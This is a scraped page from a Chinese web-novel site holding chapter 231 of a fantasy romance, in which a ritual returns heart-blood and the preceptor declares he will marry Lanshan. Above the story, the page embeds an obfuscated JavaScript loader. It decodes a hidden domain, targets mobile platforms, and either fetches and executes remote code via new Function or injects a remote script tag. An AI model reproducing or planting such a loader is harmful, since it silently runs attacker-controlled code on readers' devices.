98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuc2Rqa2JjamtzYmRzdnYuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一章

第二百三十一章 血归原位,以约覆约(1 / 1)

加入书签 | 推荐本书 | 问题反馈 |

兰珊疼得直抖,她明明是站着,却痛得很想原地蜷缩成一小团。

即便被国师谭护在怀中,但周遭乍起之风依旧吹得她纤瘦的身体摇摇晃晃。男人一只手握紧她的肩膀,另一只手在空中飞快结着掌印,黑金色闪电一样的灵力随风力旋转游走,受他调动,维系阵法。

他温热的薄唇则覆在少女血色全无的软唇上,似乎也被这巨大的风势和本人的动作所影响,贴住了她的唇瓣,时而按压,时而碾磨。

飞沙走石,风云变色,布幡大力拂动在祭台上方,不断振动出一声声脆响,好似随时会被风力扯裂。

须臾,男子的薄唇移开。

少女眼尾坠着泪珠,面上那欣慰甘愿的浅淡笑容已经消失,唯有痛楚之色下泛出的缕缕疑惑,她疼得有些虚焦的视线投了过来,似乎是想问他为什么,但两片香柔的软唇却只是无力地抖了抖。

国师谭看着她展平的唇角,感到满意了些,他心底黑暗暴戾的嫉妒情绪不得消减,只是又能暂时被压制住了。

他似乎也因维持阵法的巨大消耗而显出几分吃力,一时埋首于她的鬓边,气息不稳地低声说道,“注意呼吸,以意引气,沉于丹田。”

随着三滴真心血重新没入三人的胸口处,八卦阵心中央肆虐的狂风更加恐怖,吹得人几乎睁不开眼睛。纵横交错的金黑色灵力如龙似蛟,听凭国师谭的手印调度,在阵中飞闪穿梭。阵外传来隆隆之声,似乎是峰峦也发出了怒吼。

站在卦阵边缘的几人既要压阵,又要继续仪式,尤其是青宇师徒,同样在疼痛之中等待着真心血的归来。所有人都只能隐约看见阵眼中两人相拥的身影,而国师谭沉沉的声音也唯有兰珊听得见。

她本就心口痛得无以复加,几乎想要放弃对意识的控制,以此来逃避这种剜心似的痛苦。全靠那股必须改变青宇三人命运的信念撑着,她才努力保持清醒地煎熬了下来,又因不解敖潭此举何故而困惑,心尖越发被揪刺撕扯得疼痛难忍。

此刻,听到他的提醒,又感受到之前渡入她口中的温热气息也随之停止,她这才明白,他刚刚是担心她会在剧痛之下闭气昏厥,所以续了几口气给她。

至于用舌尖来顶开她的嘴……大概也是因为她疼得咬紧了牙关,不懂配合,他才不得已而为之的吧。

兰珊认定男子心中对自己无情无爱,做出这番举动定然有正当理由,此刻也不是纠结这等旖旎细节的时刻,他自认为找到了缘由,便将此事搁下,紧急调整好自己的呼吸。

虽然她现在的每一次呼吸都会牵扯到心口的莫大痛楚,但随着那三滴真心血彻底脱离她,已经回归青宇他们心口,并在阵法护持下重新融合了八九成,她正在承受的这种痛苦也在逐渐减轻。

但就在仪式临近结束之际,异变突生!

风中抖动的布幡忽然纷纷爆裂,似黑白斑驳的鸟羽般碎成无数片四处飞散!另有一股风旋从天而降,风声如雷,咆哮着打着卷径直冲向青宇、百川与凌若谷,令得他们身形不稳,若非及时拔剑刺地,险些就要被从各自所在的卦位上冲退开!

幸好,北华真人与风里峭及时出手。北华稳立原地确保阵法的完整不破,风里峭则按照国师谭事先的吩咐,当即飞入阵中,身形如蹈,手持法器将这一股风旋之力割裂成几段,令其冲力大减,也就此保证了青宇师徒继续站在阵点之上,完成真心血的最后一成融合。

只是,令所有人都没想到的是,那股风力似有灵智,冲击青宇三人未果,又被分割作几段,在与国师谭的黑金色灵力缠斗之际,其中有一股居然抓住机会卷住他怀中兰珊的半边身子,意图将她卷走!

想起上一次在峰顶,那朱色殿门大开,想要将兰珊吸入其中的情形,玄衣男子淡漠的神色中闪过沉沉阴鸷,护住兰珊的同时,他双眸之中竖瞳乍现,仰头再一次发出铮铮龙吟。

一股浑厚的力量与这一声长啸同时灌入风旋之中,将其彻底粉碎!

几乎是同一时间,真心血洇出的最后一丝鲜红也消失在了青宇师徒的胸口,这代表着它们已经完全物归原位。

兰珊浑身冷汗淋漓,心口已经疼麻了,又因为最后这一重险象环生的变故而心脏狂跳,如今整个人脱力似地靠在国师谭怀中。

“仪式算是完成了吗?”她问,像是有些不放心,必须得到他的亲口确认。

“嗯。”国师谭的声音嘶哑至极,透着一股少见的疲惫与虚弱。

“谢谢。”兰珊很小声地说,确保自己的话只有他一个人听得见。

作为敖潭执念的化身,男人的灵力早已透支,刚刚给那风旋的重重一击,更是远超负荷。此刻,他喉头也有一股腥甜血气隐隐翻涌,在听到少女意味不明的道谢后,忽然更加如鲠在喉。

“不必。”他冷淡地回道,看着青宇师徒还有北华和风里峭都向阵眼走来,他搂紧了少女,像是怀抱着自己千辛万苦抢回来的宝贝,却又必须表现得云淡风轻并不在意,否则宝贝可能会自己长出翅膀飞走。

“我们该走了。”他迈出的第一步明显脚步虚浮,这下兰珊也察觉出他的精疲力竭了,心中感激之情更盛,恰好抬眸与走上前的青宇三人的视线相碰。

她只匆匆看清他们并不算好的气色,猜想自己此刻的脸色估计更差,便不由自主地率先移开了目光,与他们擦肩而过,乖乖陪在国师谭身边,听他与北华谈话。

“刚刚那股风……”北华皱眉。

“峰峦还是想要兰珊献祭。”国师谭冷冷地道,他的面色很不好,“即使三滴真心血物归原主,峰峦之怒得以平息,但和守峰人有着命约关联,又拥有寒冰果的祭品,本身也很不错。”

当时青宇师徒会与兰珊缔结命约,也是担心她被蛇妖用术法cao纵影响会受到更多伤害,但此时经由国师谭之口提及,倒似他们做错了事,将兰珊置于险境一般。

国师谭知道,上一次青宇他们把真心血移交给兰珊的仪式末尾出了意外,所以兰珊才会被卷上峰顶,差一点被峰峦的力量挟入那座殿内。这一回,他提前做了布置,却还是差点被峰峦的力量夺走她。

“我会再留三日,将峰峦之事处理完毕,然后尽快带她离开。”他的语气重新淡漠下来,口吻不容置疑。

凌若谷剑眉一拧,正要开口,却被青宇用眼神制止。

而百川则安静地站在一边,看着并不把视线投向他们的少女,没人知道,他在想什么。

倒是北华说了一句中肯的实在话,“这命约难结,更难解。”

国师谭道,“不难。这次回去,我便与兰珊成婚。”

婚约亦是俗世最常见的一种因缘誓约,同属死生契阔,就算命约不好解,却可以被更深更新的羁绊覆盖掉,然后取而代之。

少女倒是不懂其中的机巧复杂,只是单纯听到“成婚”二字而惊讶地抬起头看向国师谭,后者却只是向她微微颔首。她弄不清楚他是什么意思,又不敢当场问他此话是真是假。

加上明明对她死心了的青宇师徒,此刻也都纷纷在看着她。其实早在刚到祭台时,她便发现了,他们看她的目光与往日似乎并没有什么不同,没有冷漠、没有疏离、没有厌弃、没有憎恶,只有一如既往的深情。

可敖潭对她说过,唯有他们对她死心了,真心血才能顺利归还。

如今,真心血已然是物归原主了,那么他们定然是对她死心了的,可又怎地……

虽然事态很早之前就脱离了她的计划与掌控,但这一刻,兰珊依旧觉得有哪里好像不太对,没来由地心乱如麻。



上一章
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间